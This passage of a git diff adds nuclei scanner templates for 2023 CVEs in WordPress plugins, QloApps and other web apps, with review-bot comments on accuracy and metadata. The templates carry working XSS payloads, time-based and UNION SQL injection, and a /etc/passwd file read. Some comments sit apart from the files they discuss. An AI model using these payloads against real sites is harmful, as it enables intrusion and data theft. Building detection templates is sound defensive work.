+ metadata: + verified: true + tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Member Database")' + condition: and 
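Review bot: The `configuration/save` request overwrites the target's entire application configuration — `CFG[APP_NAME]=Test`, `CFG[APP_SHORT_NAME]=test`, `CFG[APP_LANGUAGE]=english.php`, `CFG[APP_TIMEZONE]=America/New_York`, the date/number formats, rows per page, and empty `APP_LOGO`/`APP_FAVICON` values — and nothing restores the previous settings, so a run against a production instance renames and reconfigures it whether or not it is vulnerable. That is destructive, not merely intrusive: at minimum put a prominent warning in `description`, and preferably GET `configuration/application` first, extract the current `CFG[...]` values and resubmit them with only `CFG[APP_COPYRIGHT_NAME]` changed. The copyright text is presumably rendered on every page (the follow-up `dashboard/` GET is where it is matched), so the stored script runs for every user until an admin edits it. `cvss-metrics` is the 9.8 vector while `cvss-score` is 5.4; use `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N` like the sibling templates.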
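Review bot: The description says the XSS is `via the tab parameter`, but the request puts the payload in `value=asd%22%3C%2Fscript%3E...` of the `action=sort` POST and never sends `tab`; correct the description to the parameter the template actually exercises (or change the request if the advisory's parameter is right). The name says `Membership Database <= 1.0` while the description says `before 1.0`, which would exclude the only affected version; make both read `<= 1.0`. `cvss-metrics` has `PR:N` although the template must log in with `{{username}}/{{password}}` and is tagged `authenticated`; check the WPScan entry and use `PR:L` if that is what it rates.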
diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml new file mode 100644 index 0000000000..8d9da20898 --- /dev/null +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-1730 + +info: + name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection + author: theamanrawat + severity: critical + description: | + The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + remediation: Fixed in version 3.1.5 + reference: + - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 + - https://wordpress.org/plugins/supportcandy/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-1730 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "supportcandy")' + condition: and diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml new file mode 100644 index 0000000000..35d0e2d486 --- /dev/null +++ b/http/cves/2023/CVE-2023-1835.yaml 
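Review bot: The only evidence of injection is `duration>=6` on a single request, so any target that happens to take six seconds to answer `/` (cold cache, WAF tarpit, overloaded host) is reported as vulnerable. Send a control request with `SLEEP(0)` first and assert on the difference using the per-request `duration_N` variables, in the same way the other templates in this change use `status_code_2`/`body_2`; if DSL arithmetic is not available, `duration_1 < 3 && duration_2 >= 6` is the simpler form. `verified: "true"` is a string here where the other templates use the boolean `true`, and the tag list lacks the `wp,wp-plugin` tags the other WordPress templates carry.

```yaml
http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(0)))NNTu)-- cLmu"}

      # … unchanged: the original SLEEP(6) request, now the second request …

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 - duration_1 >= 5'
          - 'status_code_2 == 200'
          - 'contains(body_2, "supportcandy")'
        condition: and
```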
@@ -0,0 +1,43 @@ +id: CVE-2023-1835 + +info: + name: Ninja Forms < 3.6.22 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341 + - https://wordpress.org/plugins/ninja-forms/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1835 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1835 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Ninja Forms")' + condition: and diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml new file mode 100644 index 0000000000..ee72893fa9 --- /dev/null +++ b/http/cves/2023/CVE-2023-1890.yaml 
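Review bot: The description says the XSS is `via the page parameter`, but the request injects into `title=` (`page=nf-processing&title=%253Csvg...`) and `page` only selects the admin screen; correct the description to name the `title` parameter. The tag list splits the plugin name into `ninja,forms`; use the single plugin slug `ninja-forms` so the template is selectable by product. `cvss-metrics` has `PR:N` while the template logs in first and is tagged `authenticated`; confirm the rating against the WPScan entry.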
@@ -0,0 +1,44 @@ +id: CVE-2023-1890 + +info: + name: Tablesome < 1.0.9 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d + - https://wordpress.org/plugins/tablesome/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1890 + remediation: Fixed in version 1.0.9. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1890 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "tablesome")' + condition: and diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml new file mode 100644 index 0000000000..7b89d30332 --- /dev/null +++ b/http/cves/2023/CVE-2023-2023.yaml 
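Review bot: The description attributes the issue to `the tab parameter`, but the request carries the payload as a bare query key (`post_type=tablesome_cpt&a%22%3e%3cscript%3e...`) with no `tab=` at all, so the write-up and the test disagree. Either the description is wrong or the request should be `...&tab=%22%3e%3cscript%3ealert%60document.domain%60%3c%2fscript%3e` so it exercises the parameter the advisory names. The reflection presumably comes from the plugin echoing the whole query string into an attribute; confirm which, because a patched version that escapes only `tab` would still reflect an arbitrary key and fire this matcher.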
@@ -0,0 +1,44 @@ +id: CVE-2023-2023 + +info: + name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.7.3 + reference: + - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2023 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml new file mode 100644 index 0000000000..229a2214db --- /dev/null +++ b/http/cves/2023/CVE-2023-2252.yaml 
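Review bot: The matcher `contains(body_2, "onanimationstart=alert(document.domain)//")` also fires on a patched plugin that HTML-escapes the quote, because `&quot; style=animation-name:rotation onanimationstart=alert(document.domain)//` still contains that substring. Add a negative check for the escaped form, `- '!contains(body_2, "&quot; style=animation-name:rotation")'`, or match the unescaped `" style=animation-name:rotation onanimationstart=` prefix. The same pattern is used in the Advanced Custom Fields template in this change and should be tightened there as well.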
@@ -0,0 +1,42 @@ +id: CVE-2023-2252 + +info: + name: Directorist < 7.5.4 - Local File Inclusion + author: r3Y3r53 + severity: medium + description: | + Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. + remediation: Fixed in version 7.5.4 + reference: + - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 + - https://wordpress.org/plugins/directorist/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2252 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml new file mode 100644 index 0000000000..d61fec1bf7 --- /dev/null +++ b/http/cves/2023/CVE-2023-2272.yaml 
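Review bot: This template has no `classification` block — no `cvss-metrics`, `cve-id` or `cwe-id` — although every other CVE template in this change carries one; add at least `cve-id: CVE-2023-2252` and `cwe-id: CWE-22` (or CWE-98 if the file is included rather than read), with the score from the linked NVD entry. The `file=%2Fetc%2Fpasswd` value is fed to the CSV import at `step=2`, so the `root:[x*]:0:0` regex relies on the importer echoing the file back; a one-line comment saying so, and noting that the check is Unix-only by construction, would help the next maintainer. Severity `medium` for an authenticated arbitrary file read is defensible but should match whatever the classification block ends up saying.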
@@ -0,0 +1,46 @@ +id: CVE-2023-2272 + +info: + name: Tiempo.com <= 0.1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e + - https://wordpress.org/plugins/tiempocom/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2272 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2272 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Tiempo")' + condition: and diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 6c89c80b4d..9cdb305829 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: 
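Review bot: The name says `Tiempo.com <= 0.1.2` while the description says `before 0.1.2`; they disagree on whether 0.1.2 itself is affected, which decides whether a hit on that version is a true positive. Align both with the WPScan entry referenced. `cvss-metrics` has `PR:N` although the template authenticates first and is tagged `authenticated`; verify the rating. The product check `contains(body_2, "Tiempo")` is short enough to match unrelated text; prefer `Tiempo.com` or the plugin slug `tiempocom`.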
diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 6a91a88389..8d281bfca8 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml new file mode 100644 index 0000000000..ce6d92452d --- /dev/null +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30256 + +info: + name: Webkul QloApps 1.5.2 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + reference: + - https://github.com/webkul/hotelcommerce + - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html + - https://github.com/ahrixia/CVE-2023-30256 + - https://nvd.nist.gov/vuln/detail/CVE-2023-30256 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "xss onfocus=alert(document.domain) autofocus= xss" + - "hasConfirmation" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 
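Review bot: The request carries a fixed `token=6c62b773f1b284ac4743871b300a0c4d` and `rand=1679996611398` copied from the PoC; if the QloApps authentication controller validates the token against the session, the request is rejected on every other install, and if it does not, the values are noise. The CVE-2023-36289 template in this change hits the same `controller=authentication&SubmitCreate=1` flow with `token={{randstr}}`, which suggests the token is not checked — use `token={{randstr}}` here too and drop `rand`. The description spells the vendor `Webkil`; it is `Webkul`, as the name says.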
diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml new file mode 100644 index 0000000000..3a90d33596 --- /dev/null +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30777 + +info: + name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f + - https://wordpress.org/plugins/advanced-custom-fields/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-30777 + remediation: Fixed in version 6.1.6. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30777 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Advanced Custom Fields")' + condition: and diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 0cae8c42fa..29b5ad3781 100644 
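Review bot: `contains(body_2, "onanimationstart=alert(document.domain)//")` stays true when the plugin HTML-escapes the input, because `&quot;style=animation-name:rotation onanimationstart=alert(document.domain)//` contains the same substring; add `- '!contains(body_2, "&quot;style=animation-name")'` or match the unescaped `"style=animation-name:rotation onanimationstart=` prefix. The tag `advance-custom-field` does not match the plugin slug `advanced-custom-fields`; use the slug. Typo in the description: `beofre` → `before`.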
--- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml new file mode 100644 index 0000000000..eb0ef67c53 --- /dev/null +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-36287 + +info: + name: Webkul QloApps 1.6.0 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter. + reference: + - https://github.com/webkul/hotelcommerce + - https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36287 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - raw: + - | + POST / HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + controller=change-currency9405'-alert(document.domain)-'&id_currency= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'change-currency9405'-alert(document.domain)-'';" + - "customizationIdMessage" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml new file mode 100644 index 0000000000..d7051ea8a8 --- /dev/null +++ b/http/cves/2023/CVE-2023-36289.yaml 
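Review bot: The raw request line is `POST / HTTP/2` while every other raw request in this change uses `HTTP/1.1`; as far as I know nuclei's raw parser expects an HTTP/1.x version string and negotiates HTTP/2 separately, so this is either silently rewritten or sent verbatim to servers that may reject it. Use `POST / HTTP/1.1` unless there is a demonstrated reason for the difference. The matcher `'change-currency9405'-alert(document.domain)-'';` pins the exact JS-context reflection, which is good; the description's claim that an attacker can `obtain a user's session cookie` overstates it when the cookie is HttpOnly — "execute script in the victim's session" is the accurate wording.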
@@ -0,0 +1,50 @@
+id: CVE-2023-36289
+
+info:
+ name: Webkul QloApps 1.6.0 - Cross-site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.
+ reference:
+ - https://github.com/webkul/hotelcommerce
+ - https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-36289
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-36289
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,webkul-qloapps,unauth
+
+variables:
+ email: "{{randstr}}@{{rand_base(5)}}.com"
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'onmouseover=alert(document.domain)'
+ - 'hasConfirmation'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml
new file mode 100644
index 0000000000..e30965bf9a
--- /dev/null
+++ b/http/cves/2023/CVE-2023-36346.yaml
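Review bot: The `name` field, `Webkul QloApps 1.6.0 - Cross-site Scripting`, is byte-identical to the one in CVE-2023-36287 added in the same commit, so findings from the two templates cannot be told apart in scanner output without opening the template id. Naming the affected input, as the description already does, resolves this: `name: Webkul QloApps 1.6.0 - Cross-site Scripting (email_create/back)`. `max-request: 1` is also missing from the metadata block.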
@@ -0,0 +1,42 @@
+id: CVE-2023-36346
+
+info:
+ name: POS Codekop v2.0 - Cross-site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
+ reference:
+ - https://yuyudhn.github.io/pos-codekop-vulnerability/
+ - https://www.youtube.com/watch?v=bbbA-q1syrA
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-36346
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-30256
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,pos,codekop,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/print.php?nm_member="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml
new file mode 100644
index 0000000000..ca2afd9f4f
--- /dev/null
+++ b/http/exposed-panels/qdpm-login-panel.yaml
@@ -0,0 +1,35 @@
+id: qdpm-login-panel
+
+info:
+ name: qdPM Login Panel
+ author: theamanrawat
+ severity: info
+ metadata:
+ verified: "true"
+ shodan-query: http.favicon.hash:762074255
+ tags: panel,qdpm,login
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/index.php/login'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'qdPM'
+ - '/index.php/login/restorePassword'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml
index 4327f1b5d4..68c7640bad 100644
--- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml
+++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml
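Review bot: The classification block reads `cve-id: CVE-2023-30256` while the template `id` and the NVD reference are CVE-2023-36346; the line should be `cve-id: CVE-2023-36346`, otherwise reports generated from this template carry the wrong identifier. As rendered here the body matcher holds only an empty string, `- ""`, which a word matcher satisfies for any response, and the request path `print.php?nm_member=` carries no value; if the angle-bracket payload was stripped in rendering this is a display artifact, but the committed file should be checked to match on a concrete reflected string rather than on nothing. The template also uses the legacy `requests:` key where every other template in this commit uses `http:`, and `max-request: 1` is absent from metadata.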
@@ -16,7 +16,7 @@ info: max-request: 2 verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,xss,stored,huntr + tags: yeswiki,xss,stored-xss,huntr http: - raw:
diff --git a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml
new file mode 100644
index 0000000000..a4b713cde8
--- /dev/null
+++ b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml
@@ -0,0 +1,44 @@
+id: contus-video-gallery-sqli
+
+info:
+ name: WordPress Video Gallery <= 2.8 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
+ reference:
+ - https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243
+ - https://wordpress.org/plugins/photo-gallery/
+ remediation: Fixed in version 1.6.3
+ metadata:
+ verified: true
+ tags: sqli,wpscan,wordpress,contus-video-gallery,unauth
+
+variables:
+ num: '999999999'
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=GalleryBox&filter_tag=1)" union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5 join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5({{num}}))a20 join (select 2)a21 join (select 2)a22 join (select 2)a23-- -
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "c8c605999f3d8352d7bb792cf3fdb25b"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
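Review bot: The second reference, `https://wordpress.org/plugins/photo-gallery/`, points at a different plugin than the one this template targets (the `name` and `id` say Video Gallery / contus), so the plugin link should be replaced with the page of the plugin the wpscan advisory actually describes. `remediation: Fixed in version 1.6.3` is also inconsistent with `name: WordPress Video Gallery <= 2.8 - SQL Injection`, since a fixed version cannot be lower than the latest affected version; one of the two values needs to be corrected against the advisory. Minor: `max-request: 1` is missing from metadata, and the tags omit the `wp,wp-plugin` pair that the sibling WordPress templates in this commit carry.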
diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml
new file mode 100644
index 0000000000..599bc56d83
--- /dev/null
+++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml
@@ -0,0 +1,30 @@
+id: leaguemanager-sql-injection
+
+info:
